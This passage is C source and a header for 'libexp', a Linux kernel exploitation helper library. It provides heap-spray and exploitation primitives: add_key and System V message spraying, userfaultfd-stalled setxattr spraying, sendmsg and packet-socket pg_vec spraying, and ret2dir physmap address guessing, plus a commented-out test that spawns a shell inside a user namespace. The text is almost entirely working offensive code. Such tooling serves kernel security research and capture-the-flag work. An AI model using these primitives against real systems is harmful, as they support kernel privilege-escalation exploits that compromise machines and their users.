void unset_cpu(void)
{
    if(unlikely(sched_setaffinity(0, sizeof(cpu_set_t), &cpu_mask) != 0))
        error_out("fail to unset cpu affinity");
}

int write_file(const char* fname, const char* fmt, ...)
{
    char buf[1024];
    va_list args;
    va_start(args, fmt);
    vsnprintf(buf, sizeof(buf)-1, fmt, args);
    va_end(args);
    buf[sizeof(buf)-1] = 0;
    int len = strlen(buf);

    int fd = open(fname, O_WRONLY | O_CLOEXEC);
    if (fd == -1)
        return -1;
    if (write(fd, buf, len) != len) {
        close(fd);
        return -1;
    }
    close(fd);
    return 0;
}

void setup_sandbox(void)
{
    int real_uid = getuid();
    int real_gid = getgid();

    if (unshare(CLONE_NEWUSER | CLONE_NEWNET | CLONE_NEWNS) != 0)
        error_out("unshare fails");
    if (write_file("/proc/self/setgroups", "deny") < 0)
        error_out("write_file(/proc/self/set_groups) fails");
    if (write_file("/proc/self/uid_map", "0 %d 1\n", real_uid) < 0)
        error_out("write_file(/proc/self/uid_map) fails");
    if (write_file("/proc/self/gid_map", "0 %d 1\n", real_gid) < 0)
        error_out("write_file(/proc/self/gid_map) fails");
}

void *umem_alloc(void *addr, size_t size)
{
    void *ret;
    int flags = MAP_SHARED | MAP_ANON;
    if (addr)
        flags |= MAP_FIXED;
    ret = mmap(addr, size, PROT_READ | PROT_WRITE | PROT_EXEC, flags, -1, 0);
    if(addr && ret != addr)
        error_out("[-] umem_alloc fails to mmap the fixed address %p", addr);
    if(!addr && !ret)
        error_out("[-] umem_alloc fails to mmap NULL");
    return ret;
}

/* use add_key for defragmentation
 * add_key will allocate 5 objects in one call when the key is added for the first time
 * and 4 objects afterwards
 * 1. strlen(desc) and gets freed eventually
 * 2. plen caused by kvmalloc and gets freed eventually
 * 3. (struct user_key_payload) + plen, sizeof(payload)+0x18
 * 4. sizeof(struct assoc_array_edit) in size of 328 (0x148), and freed if not the first time
 * (5). sometimes allocates (struct assoc_array_node) twice 0x98/152
 * 6. struct key, size of 0x100 -> through special cache, not kmalloc
 * 7. sizeof(desc), caused by kmemdup
 */
// here we use the desc method
void defragment_add_key(size_t size, u32 num)
{
    char type[] = "user";
    char *desc = alloca(size+1);
    char payload[1];

    if(num > 195)
        puts("num too large, defragmentation is likely to fail");

    memset(desc, 0, size+1);
    payload[0] = 'A';
    for(int i=0; i<num; i++) {
        key_serial_t key;
        rand_str(desc, size-1);
        key = add_key(type, desc, payload, sizeof(payload), KEY_SPEC_THREAD_KEYRING);
        if(key < 0)
            error_out("add_key failed at idx %d", i);
    }
}

void add_key_spray_num(void *payload, size_t size, u32 num)
{
    char type[] = "user";
    char desc[0x10];

    memset(desc, 0, sizeof(desc));
    for(int i=0; i<num; i++) {
        key_serial_t key;
        rand_str(desc, sizeof(desc)-1);
        key = add_key(type, desc, payload, size, KEY_SPEC_THREAD_KEYRING);
        if(key < 0)
            error_out("add_key failed at idx %d", i);
    }
}

// max length: 4096
void add_key_desc_spray_num(char *desc, u32 num)
{
    char type[] = "user";
    size_t size = strlen(desc);
    size_t ksize = kmalloc_size(size);
    char payload[1];

    if(num > 195)
        puts("num too large, defragmentation is likely to fail");
    if(ksize <= size)
        error_out("size too large, it should be smaller than the next kmalloc size");
    if(unlikely(size >= 4096))
        error_out("[-] max size of desc spray is 0x1000");

    payload[0] = 'A';
    for(int i=0; i<num; i++) {
        key_serial_t key;
        rand_str(&desc[size], ksize-size-1);
        key = add_key(type, desc, payload, sizeof(payload), KEY_SPEC_THREAD_KEYRING);
        if(key < 0)
            error_out("add_key failed at idx %d", i);
    }
}

static struct msg_spray_t *msg_spray_once(void *payload, size_t msg_size, u32 num)
{
    int msgqid;
    char *buf;

    // create the message queue id first
    msgqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT);
    if(unlikely(msgqid < 0))
        error_out("fail to create a System V message queue");

    // prepare msg buffer
    if(payload)
        buf = payload;
    else {
        buf = alloca(msg_size);
        memset(buf, 'A', msg_size);
    }

    // do spray
    for(int i=0; i<num; i++) {
        if(unlikely(msgsnd(msgqid, buf, msg_size, IPC_NOWAIT) < 0)) {
            error_out("msgsnd failed at idx %d", i);
        }
    }

    // return info about this spray
    struct msg_spray_t *spray = malloc(sizeof(struct msg_spray_t));
    spray->next = NULL;
    spray->msgqid = msgqid;
    spray->payload = payload;
    spray->len = msg_size;
    spray->num = num;
    return spray;
}

struct msg_spray_t *msg_spray(void *payload, size_t msg_size, u32 num)
{
    u32 max_num = msgmnb / (msg_size + 0x30);
    u32 sent = 0;
    struct msg_spray_t *spray = NULL, *tmp_spray;

    // do the max number of allocations and then repeat with a new message queue
    while(num > 0) {
        u32 todo = (num >= max_num) ? max_num : num;
        tmp_spray = msg_spray_once(payload, msg_size, todo);
        sent += todo;
        num -= todo;
        // link tmp_spray
        if(!spray)
            spray = tmp_spray;
        else {
            tmp_spray->next = spray->next;
            spray->next = tmp_spray;
        }
    }
    return spray;
}

struct msg_spray_t *msg_spray_max(void *payload, size_t plen)
{
    size_t size = plen + 0x30;
    u32 max_num = msgmnb / size;
    return msg_spray(payload, plen, max_num);
}

void msg_spray_clean(struct msg_spray_t *spray)
{
    void *buffer = malloc(sizeof(struct msgbuf) + spray->len);
    while(spray) {
        //printf("spray->len: %d\n", spray->len);
        //printf("spray->payload: %p\n", spray->payload);
        //printf("spray->num: %d\n", spray->num);
        //printf("spray->msgqid: %d\n", spray->msgqid);
        //printf("spray->next: %p\n", spray->next);
        for(int i=0; i<spray->num; i++) {
            if (msgrcv(spray->msgqid, buffer, spray->len, 0, MSG_NOERROR | IPC_NOWAIT) == -1) {
                if(errno != ENOMSG)
                    error_out("[msg_spray_clean]");
            }
        }
        if(msgctl(spray->msgqid, IPC_RMID, NULL))
            error_out("fail to remove message queue");
        spray = spray->next;
    }
    //puts("clean done");
}

/* we don't want to spend extra time during defragmentation, so we should
 * allocate message queue ids ahead of time.
 * The difference shouldn't be too much though,
 * each allocation takes about 3 microseconds
 * */
void defragment_msg(size_t size, u32 num)
{
    // should be equivalent with the original message in terms of heap usage
    size = (size <= 0x30) ? 0x31 : size;
    size_t msg_size = size - 0x30;
    u32 max_num = msgmnb / size;
    u32 sent = 0;
    msg_spray(NULL, msg_size, num);
}

void defragment(size_t size, u32 num)
{
    // we prefer msg_msg to do defragmentation because it does not
    // allocate extra objects
    if(size <= 0x20)
        defragment_add_key(size, num);
    else
        defragment_msg(size, num);
}

static void *fault_handling_thread(void *arg)
{
    struct uffd_msg msg; /* Data read from userfaultfd */
    void *page = NULL;
    struct uffdio_copy uffdio_copy;
    void (*handler)(void *);
    struct pollfd pollfd;
    struct fault_struct *fault = (struct fault_struct *)arg;
    u64 addr;
    int uffd = fault->uffd;

    pthread_detach(pthread_self());
    int found = 0;

    // polling events on uffd
    pollfd.fd = uffd;
    pollfd.events = POLLIN;
    if(poll(&pollfd, 1, -1) < 0) // wait forever if no new events
        error_out("polling error");

    dprintf("\nfault_handler_thread():\n");
    dprintf("POLLIN = %d; POLLERR = %d\n", (pollfd.revents & POLLIN) != 0, (pollfd.revents & POLLERR) != 0);

    // read the pagefault message
    if(read(uffd, &msg, sizeof(msg)) <= 0)
        error_out("fail to read uffd message");

    // sanity check the event type
    if (msg.event != UFFD_EVENT_PAGEFAULT)
        error_out("unexpected event on userfaultfd handling");

    addr = msg.arg.pagefault.address;
    dprintf("    UFFD_EVENT_PAGEFAULT event: ");
    dprintf("flags = %llx; ", msg.arg.pagefault.flags);
    dprintf("address = %llx\n", addr);

    // look for the registered page handler
    u64 start = (u64)fault->addr;
    if(addr >= start && addr < start + fault->len) {
        page = addr - start + fault->src_page;
        found = 1;
    }
    if(!found)
        error_out("Can't find fault handler for addr 0x%llx", msg.arg.pagefault.address);

    // call the hook
    fault->hook((void *)addr);

    // really handle the page fault
    uffdio_copy.src = (unsigned long) page;
    uffdio_copy.dst = (unsigned long) addr & ~(0x1000-1);
    uffdio_copy.len = 0x1000;
    uffdio_copy.mode = 0;
    uffdio_copy.copy = 0;
    if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
        error_out("ioctl-UFFDIO_COPY");

    // after successfully handling the page fault, sleep forever
    sleep(10000);
}

void *reg_pagefault(void *wanted, void *src_page, size_t len, void (*hook)(void *))
{
    int flags = MAP_PRIVATE | MAP_ANONYMOUS;
    void *addr;
    struct uffdio_register uffdio_register;
    pthread_t tid;
    struct uffdio_api uffdio_api;

    // initialize userfaultfd api
    int uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    if(uffd < 0)
        error_out("fail to call userfaultfd");
    uffdio_api.api = UFFD_API;
    uffdio_api.features = 0;
    if(ioctl(uffd, UFFDIO_API, &uffdio_api) < 0)
        error_out("ioctl UFFDIO_API error");

    // map the page that needs handling
    if(wanted)
        flags |= MAP_FIXED;
    addr = mmap(wanted, len, PROT_READ | PROT_WRITE | PROT_EXEC, flags, -1, 0);
    if(addr < 0 || (wanted && addr != wanted))
        error_out("mmap failed");

    // tell the kernel this address needs page handling
    uffdio_register.range.start = (unsigned long) addr;
    uffdio_register.range.len = len;
    uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
    if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
        error_out("ioctl UFFDIO_REGISTER error");

    // initialize the fault_struct
    struct fault_struct *fault = malloc(sizeof(struct fault_struct));
    fault->len = len;
    fault->src_page = src_page;
    fault->addr = addr;
    fault->hook = hook;
    fault->next = NULL;
    fault->uffd = uffd;

    // launch the fault handling thread, it will always be sleeping if the api is not used
    if(pthread_create(&tid, NULL, fault_handling_thread, fault))
        error_out("fail to create page fault handling thread");

    return addr;
}

void init_pagefault(void)
{
}

/* Universal Heap Spray */
void init_univ_spray(void)
{
    // create a dummy file
    if(access(UNIV_SPRAY_FILE, F_OK) == 0)
        unlink(UNIV_SPRAY_FILE);
    int fd = open(UNIV_SPRAY_FILE, O_CREAT);
    if(fd < 0)
        error_out("fail to create a file for universal heap spray");
    close(fd);
    init_pagefault();
}

static void *univ_spray_func(void *args)
{
    void **args2 = (void **)args;
    struct spray_struct *spray = (struct spray_struct *)args2[0];
    void *addr = args2[1];

    pthread_detach(pthread_self());
    while(!spray->stage);
    syscall(__NR_setxattr, UNIV_SPRAY_FILE, "libexp", addr, spray->len, 0);
    // sleep forever
    sleep(10000);
}

struct spray_struct *prepare_univ_spray(void *payload, size_t len, u32 num, void (*hook)(void *))
{
    void *buffer = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if(buffer < 0)
        error_out("fail to prepare for universal spray");

    // place payload at the correct places
    memcpy(buffer+0x1000-len+1, payload, len-1);
    *(char *)(buffer) = ((char *)payload)[len-1];

    // create struct
    struct spray_struct *spray = malloc(sizeof(struct spray_struct));
    spray->payload = payload;
    spray->len = len;
    spray->num = num;
    spray->stage = 0;

    // register for pagefault
    for(int i=0; i<num; i++) {
        pthread_t tid;
        // map 2 pages, initialize the first page, remap the second page for page faulting
        void *addr = mmap(NULL, 0x2000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        memcpy(addr, buffer, 0x1000);
        void *addr2 = reg_pagefault(addr+0x1000, buffer, 0x1000, hook);

        // start univ_spray_func thread
        void **args = malloc(sizeof(void *) * 2);
        if(!args)
            error_out("malloc error");
        args[0] = spray;
        args[1] = addr + 0x1000 - len + 1;
        if(pthread_create(&tid, NULL, univ_spray_func, args))
            error_out("fail to create page fault handling thread");
    }
    return spray;
}

void univ_spray(struct spray_struct *spray)
{
    spray->stage = 1;
    sched_yield();
}

void nonsense(void)
{
    char buf[0x400];
    puts("start of some fake debug message");
    printf("pid: %d\n", getpid());
    puts("start of nonsense");
    memset(buf, 0, sizeof(buf));
    for(int i=0; i<10; i++) {
        hex_print(buf, sizeof(buf));
    }
}

static void stress_add_key(size_t size)
{
    char type[] = "user";
    char *desc = alloca(size+1);
    char payload[1];
    key_serial_t keys[0x600];

    memset(desc, 0, size+1);
    payload[0] = 'A';
    // do spray
    for(int i=0; i<sizeof(keys)/sizeof(keys[0]); i++) {
        key_serial_t key;
        rand_str(desc, size-1);
        key = add_key(type, desc, payload, sizeof(payload), KEY_SPEC_THREAD_KEYRING);
        keys[i] = key;
    }
    // cleanup spray
    keyctl(KEYCTL_REVOKE, KEY_SPEC_THREAD_KEYRING);
}

static void stress_msg(size_t size)
{
    size_t msg_size = size - 0x30;
    struct msg_spray_t *spray = msg_spray(NULL, msg_size, 0x600);
    msg_spray_clean(spray);
}

static void stress_percpu_cache(int cpuid, size_t cache_size)
{
    set_cpu(cpuid);
    if(cache_size <= 0x20)
        stress_add_key(cache_size);
    else
        stress_msg(cache_size);
}

void stress_all_caches()
{
#ifdef STRESS
    for(int i=0; i<sizeof(kmalloc_size_array)/sizeof(kmalloc_size_array[0]); i++) {
        size_t cache_size = kmalloc_size_array[i];
        for(int cpuid=0; cpuid<cpu_num; cpuid++) {
            // printf("%d %lx\n", cpuid, cache_size);
            stress_percpu_cache(cpuid, cache_size);
        }
    }
#endif
}

/* reference: https://www.kernel.org/doc/Documentation/vm/pagemap.txt */
u64 virt_to_physmap(u64 virt_addr, u64 page_offset_base)
{
    u64 pfn = 0;
    u64 kaddr = 0;
    u64 value = 0;
    u64 present = 0;
    int fd = open("/proc/self/pagemap", O_RDONLY);
    if(fd < 0)
        error_out("[virt_to_physmap] fail to open /proc/self/pagemap");

    // read the pagemap info about the input virtual address
    lseek(fd, (virt_addr >> PAGE_SHIFT)*sizeof(u64), SEEK_SET);
    read(fd, &value, sizeof(u64));
    // printf("pagemap: %#llx\n", value);

    // parse the value
    pfn = value & ((1UL << 55) - 1);
    present = value & (1UL << 63);
    if(present && pfn) {
        // if the page exists and the page frame exists
        kaddr = page_offset_base + PAGE_SIZE * (pfn-PFN_MIN);
    }
    close(fd);
    return kaddr;
}

int block_bit_size()
{
    int ret = 0;
    u64 val = mem_size;
    while(val > 0) {
        ret++;
        val >>= 1;
    }
    return ret+1;
}

u64 heap_to_physmap(u64 heap_ptr)
{
    int bits = 64-block_bit_size();
    u64 mask = (~(1UL << bits)) << (64-bits);
    // printf("mask: %#llx\n", mask);
    return heap_ptr & mask;
}

void *ret2dir_setup(void *src_page, u64 heap_ptr)
{
    void *kaddr = NULL;
    u64 page_offset_base = heap_to_physmap(heap_ptr);
    printf("offset_base: %#llx\n", page_offset_base);
    u64 upper_limit = mem_size & (~(PAGE_SIZE-1));
    // printf("base: %llx\n", page_offset_base);
    // printf("mem_size: %llx\n", mem_size);
    // printf("ret: %llx\n", block_bit_size());

    // // first, see whether we can directly read pagemap
    // kaddr = (void *)virt_to_physmap((u64)src_page, page_offset_base);
    // if(kaddr) return kaddr;

    // we don't have access to pagemap, try to spray the same page again and again
    // we use 1/2 of the memory and hope it lands in the middle of it
    // printf("mem_size: %llx\n", mem_size);
    int i = 0;
    for(i=0; i<(upper_limit/PAGE_SIZE)/2; i++) {
        void *addr = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANON|MAP_PRIVATE|MAP_POPULATE, -1, 0);
        // printf("addr: %p\n", addr);
        memcpy(addr, src_page, PAGE_SIZE);
        // if(i%0x10 == 0) printf("i: %d, %p, %p\n", i, addr, virt_to_physmap((u64)addr, 0));
    }
    // now we calculate where our page is, it is
    // version 1: (UPPER_LIMIT - pages_allocated)/2
    kaddr = (void *)(page_offset_base + upper_limit - (i/2)*PAGE_SIZE);
    // version 2: pages_allocated/2 + 0x3000
    // kaddr = (void *)(page_offset_base + (i/2)*PAGE_SIZE) + 0x3000;
    return kaddr;
}

struct sendmsg_spray_t *prepare_sendmsg_spray(u32 fork_num, void *payload, size_t len)
{
    if(len > optmem_max)
        error_out("object too large!");

    // record the flag first
    int *start_flag = umem_alloc(NULL, 0x1000);
    struct sendmsg_spray_t *spray = malloc(sizeof(struct sendmsg_spray_t));
    spray->start_flag = start_flag;
    spray->ready_proc_num = start_flag+1;

    // prepare payload data
    struct cmsghdr *first;
    first = (struct cmsghdr*)payload;
    first->cmsg_len = len;
    first->cmsg_level = 0; // must be different than SOL_SOCKET=1 to "skip" cmsg
    first->cmsg_type = 0x41414141; // <---- ARBITRARY VALUE
    // hex_print(first, 0x100);

    for(int i=0; i<fork_num; i++) {
        if(!clean_fork()) {
            int ret;
            // initialize unix sockets
            int socks[2];
            ret = socketpair(AF_UNIX, SOCK_DGRAM, 0, socks);
            if(ret)
                error_out("socketpair");

            // set timeout
            struct timeval tv;
            memset(&tv, 0, sizeof(tv));
            ret = setsockopt(socks[1], SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv));
            if(ret)
                error_out("setsockopt");

            // block send socket
            char buf[0x100];
            struct iovec iov = {
                .iov_base = buf,
                .iov_len = sizeof(buf),
            };
            struct msghdr mhdr;
            memset(&mhdr, 0, sizeof(mhdr));
            mhdr.msg_iov = &iov;
            mhdr.msg_iovlen = 1;
            while(sendmsg(socks[0], &mhdr, MSG_DONTWAIT) > 0);
            if(errno != EAGAIN)
                error_out("sendmsg does not block");
            __atomic_fetch_add(spray->ready_proc_num, 1, __ATOMIC_SEQ_CST);
            // puts("block done!");
            while(!*spray->start_flag);

            // prepare spray data
            iov.iov_len = 0x10;
            mhdr.msg_control = payload; // use the ancillary data buffer
            mhdr.msg_controllen = len;
            if(sendmsg(socks[0], &mhdr, 0) < 0)
                error_out("sendmsg spray error");
            error_out("sendmsg spray does not block");
            sleep(10000);
        }
    }

    // wait for all spray processes to get ready
    while(*spray->ready_proc_num != fork_num);
    return spray;
}

void sendmsg_spray(struct sendmsg_spray_t *spray)
{
    *spray->start_flag = 1;
    sched_yield();
}

void sendmsg_spray_transient(u32 num, void *payload, size_t len)
{
    if(len > optmem_max)
        error_out("object too large!");

    // prepare sockets
    int socks[2];
    int ret = socketpair(AF_LOCAL, SOCK_DGRAM, 0, socks);
    if(ret)
        error_out("socketpair");

    // prepare message
    struct msghdr mhdr;
    memset(&mhdr, 0, sizeof(mhdr));
    mhdr.msg_iovlen = 0;
    mhdr.msg_control = payload;
    mhdr.msg_controllen = len;
    mhdr.msg_name = "random"; // invalid address
    mhdr.msg_namelen = 1;

    // do it!
    for(int i=0; i<num; i++)
        sendmsg(socks[0], &mhdr, MSG_DONTWAIT);

    // cleanup
    close(socks[0]);
    close(socks[1]);
}

static int cpu_idle_cmp(const void *arg1, const void *arg2)
{
    struct cpu_info *info1 = (struct cpu_info *)arg1;
    struct cpu_info *info2 = (struct cpu_info *)arg2;
    return info1->nr_running - info2->nr_running;
}

static void shuffle(void *array, size_t n, size_t size)
{
    char tmp[size];
    char *arr = array;
    size_t stride = size * sizeof(char);

    srand(__rdtsc());
    if(n > 1) {
        for(size_t i=0; i<n-1; i++) {
            size_t rnd = (size_t) rand();
            size_t j = (i+rnd) % n;
            memcpy(tmp, arr + j*stride, size);
            memcpy(arr+j*stride, arr + i*stride, size);
            memcpy(arr+i*stride, tmp, size);
        }
    }
}

void reload_cpu_info(void)
{
    FILE *f = fopen(SCHED_DEBUG_FILE, "r");
    char *line = NULL;
    size_t n = 0;
    if(!f)
        return;

    // fill up cpu info first
    int cpuid = 0;
    while(!feof(f) && cpuid < cpu_num) {
        char *nr_running_str;
        int ret;
        ret = getline(&line, &n, f);
        if(unlikely(ret < 0))
            error_out("reload_cpu_info1");
        if(strncmp(line, "cpu#", 4))
            continue;
        ret = getline(&line, &n, f);
        if(unlikely(ret < 0))
            error_out("reload_cpu_info2");
        nr_running_str = strstr(line, ": ");
        if(unlikely(nr_running_str == NULL))
            error_out("reload_cpu_info3");
        nr_running_str += 2;
        idle_cpus[cpuid].nr_running = atoi(nr_running_str);
        idle_cpus[cpuid].cpuid = cpuid;
        cpuid++;
    }
    fclose(f);

    // shuffle and sort it according to nr_running of the CPUs
    // so that the sorted array does not favor any CPUs
    shuffle(idle_cpus, cpu_num, sizeof(*idle_cpus));
    qsort(idle_cpus, cpu_num, sizeof(*idle_cpus), cpu_idle_cmp);

    //// debug print
    //for(int i=0; i<cpu_num; i++) {
    //    printf("%d: %d\n", idle_cpus[i].cpuid, idle_cpus[i].nr_running);
    //}
}

void cleanup_msgs(void)
{
    int msgqid;
    struct msqid_ds ds;
    struct msginfo msginfo;
    int maxind = msgctl(0, MSG_INFO, (struct msqid_ds *) &msginfo);
    if(maxind < 0)
        error_out("[msg_info]");
    // printf("cleanup %d msgs\n", maxind);
    for(int i=0; i<maxind; i++) {
        int ret;
        msgqid = msgctl(i, MSG_STAT, &ds);
        if(msgqid < 0)
            continue;
        ret = msgctl(msgqid, IPC_RMID, 0);
        if(ret < 0)
            error_out("[msg_rmid]");
    }
}

u64 _safe_read_u64_from_file(char *fname, u64 def_val)
{
    if(access(fname, R_OK))
        return def_val;
    return _read_u64_from_file(fname);
}

int pg_vec_spray(void *src_buf, u32 buf_size, u32 num)
{
    if((buf_size & 0xfff) != 0)
        error_out("[pg_vec_spray] buf_size");

    // remember to run everything in the sandbox
    int s = socket(AF_PACKET, SOCK_RAW|SOCK_CLOEXEC, htons(ETH_P_ALL));
    if(s < 0)
        error_out("[pg_vec_spray] socket");

    struct tpacket_req req;
    req.tp_block_size = buf_size;
    req.tp_block_nr = num; // spray times
    req.tp_frame_size = buf_size;
    req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;
    int ret = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
    if(ret < 0)
        error_out("[pg_vec_spray] setsockopt");

    struct sockaddr_ll sa;
    memset(&sa, 0, sizeof(sa));
    sa.sll_family = PF_PACKET;
    sa.sll_protocol = htons(ETH_P_ARP);
    sa.sll_ifindex = if_nametoindex("lo");
    sa.sll_hatype = 0;
    sa.sll_pkttype = 0;
    sa.sll_halen = 0;
    memset(&sa, 0, sizeof(sa));
    sa.sll_ifindex = if_nametoindex("lo");
    sa.sll_halen = ETH_ALEN;

    void *addr = mmap(NULL, buf_size, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON|MAP_POPULATE, -1, 0);
    memcpy(addr, src_buf, buf_size);
    for(int i=0; i<num; i++) {
        ret = sendto(s, addr, buf_size, 0, (struct sockaddr *)&sa, sizeof(sa));
        if(ret < 0)
            error_out("[pg_vec_spray] sendto");
    }
    return s;
}

void setup_pg_vec()
{
    // bring up the lo interface
    int fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_IP);
    struct ifreq req;
    memset(&req, 0, sizeof(req));
    strcpy(req.ifr_name, "lo");
    req.ifr_flags = IFF_UP|IFF_LOOPBACK|IFF_RUNNING;
    int ret = ioctl(fd, SIOCSIFFLAGS, &req);
    if(ret != 0)
        error_out("[setup_pg_vec] ioctl");
    close(fd);
}

static void __attribute__((constructor)) init(void)
{
    // disable buffering
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    // very bad random seed lol
    srand(time(NULL));

    // initialize parameters
    min_cpu_freq = _get_cpu_freq(); // KHz
    min_granularity = _get_min_gran(); // NS
    msgmnb = _read_u64_from_file(MSGMNB_FILE);
    cpu_num = _get_cpu_num();
    mem_size = _get_mem_size();
    optmem_max = _safe_read_u64_from_file(OPTMEM_MAX_FILE, 0x5000);
    idle_cpus = malloc(cpu_num*sizeof(*idle_cpus));
    reload_cpu_info();

    // calculate the minimal tsc in a minimal time slice:
    // (min_cpu_freq * 10^3) * (min_granularity / 10^9) = min_cpu_freq * min_granularity / (10^6)
    min_slice_tsc = (min_cpu_freq / 1000) * (min_granularity / 1000);

    // initialize cpu_mask
    CPU_ZERO(&cpu_mask);
    for(int i=0; i<cpu_num; i++)
        CPU_SET(i, &cpu_mask);

    // init urand_fd
    urand_fd = open("/dev/urandom", 0);
    if(unlikely(urand_fd < 0))
        error_out("fail to open urandom");

#ifdef STRESS
    sleep(1);
#endif
}

static void __attribute__((destructor)) fini(void)
{
    stress_all_caches();
}

//int main()
//{
//    printf("min_cpu_freq: %lld\n", min_cpu_freq);
//    printf("min_granularity: %lld\n", min_granularity);
//    printf("min_slice_tsc: %lld\n", min_slice_tsc);
//    ts_fence();
//    set_cpu(1);
//    setup_sandbox();
//    system("/bin/sh");
//    while(1);
//}
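Finally, the library header, libexp.h: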
#define u32 unsigned int
#define u64 unsigned long long
#define i32 int
#define i64 long long

struct cpu_info {
    int cpuid;
    int nr_running;
};

struct spray_struct {
    void *payload;
    size_t len;
    u32 num;
    int stage;
};

struct msg_spray_t {
    struct msg_spray_t *next;
    int msgqid;
    void *payload;
    size_t len;
    u32 num;
};

struct sendmsg_spray_t {
    int *start_flag;
    int *ready_proc_num;
};

#define likely(x) __builtin_expect(!!(x), 1)
#define unlikely(x) __builtin_expect(!!(x), 0)

#ifndef pid_t
#define pid_t int
#define LIBEXP_PID_T
#endif

void error_out(const char *fmt, ...);
void rand_str(char *dest, size_t length);
int write_file(const char* fname, const char* fmt, ...);
void hex_print(void *addr, size_t len);
pid_t clean_fork(void);
void *umem_alloc(void *addr, size_t size);
void ts_fence(void);
void set_cpu(int);
void unset_cpu(void);
void reload_cpu_info(void);
void setup_sandbox(void);
void anti_swapper(void (*hook)(void));
void suppress_int(void (*hook)(void));
struct msg_spray_t *msg_spray(void *payload, size_t plen, u32 num);
struct msg_spray_t *msg_spray_max(void *payload, size_t plen);
void msg_spray_clean(struct msg_spray_t *);
void add_key_spray_num(void *payload, size_t size, u32 num);
void add_key_desc_spray_num(char *desc, u32 num);
void defragment(size_t size, u32 num);
void init_pagefault(void);
void *reg_pagefault(void *wanted, void *src_page, size_t len, void (*hook)(void *));
void nonsense(void);
void init_univ_spray(void);
struct spray_struct *prepare_univ_spray(void *payload, size_t len, u32 num, void (*hook)(void *));
void univ_spray(struct spray_struct *spray);
void stress_all_caches();
u64 heap_to_physmap(u64 heap_ptr);
void *ret2dir_setup(void *, u64);
struct sendmsg_spray_t *prepare_sendmsg_spray(u32, void *, size_t);
void sendmsg_spray(struct sendmsg_spray_t *);
void sendmsg_spray_transient(u32, void *, size_t);
void cleanup_msgs(void);
int pg_vec_spray(void *src_buf, u32 buf_size, u32 num);
void setup_pg_vec();

#ifdef LIBEXP_PID_T
#undef pid_t
#endif

extern u64 cpu_num;
extern struct cpu_info *idle_cpus;
extern size_t kmalloc_size_array[13];
Demo